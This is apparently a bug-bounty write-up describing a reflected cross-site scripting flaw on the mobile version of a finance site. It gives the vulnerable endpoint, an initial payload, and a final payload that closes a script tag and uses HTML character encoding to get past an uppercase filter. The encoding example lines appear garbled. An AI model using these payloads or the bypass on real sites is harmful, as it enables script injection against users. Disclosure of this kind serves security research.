Filter Bypass to Reflected XSS on https://finance.yahoo.com (mobile version)
Today I‘ll share with you a interesting XSS in Yahoo. My favorite target is Yahoo, because they have a big scope, so let’s start.
In the hunting process, I detected some websites that are responsive in a mobile way. Not always the vulnerabilities that are detected in a website are reflected in the mobile version. I tried to find any bug on the website https://finance.yahoo.com, but I didn’t find anything :(, so, I decided to find bugs in the mobile version of this website.
Until I found a very interesting endpoint
https://finance.yahoo.com/quote/xxxxxxxxyyyyzzzzzz
In this endpoint, everything I wrote using the URL was reflected in the website, although through this, I could have done a Content Spoffing, I didn’t do it since this has no impact for Yahoo and it is also out scope, so my other option was to test an XSS, which I did with the next payload
https://finance.yahoo.com/quote/"><svg onload=alert(1)>
For my luck in the source code I realized that the characters “>< were processed, then I could execute an XSS, however I did not understand at first, why XSS did not work, being that the attack vector was correct. Well, then I understood, that I had to close the </script> tag so that the XSS would work. and then…
Not running :(
Well, I started to study the behavior of this XSS, and I realized that the payload was processed in capital letters, and well, I noticed that a payload in capital letters does not work. I just needed the word “alert” to be processed in lowercase. Then I came up with an HTML character encoding.
Lowercase Coding
alert
Coding
alert
New Payload XSS
https://finance.yahoo.com/quote/"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
: O: O: O and happiness came into my life :D.
Thanks
Twitter: @saamux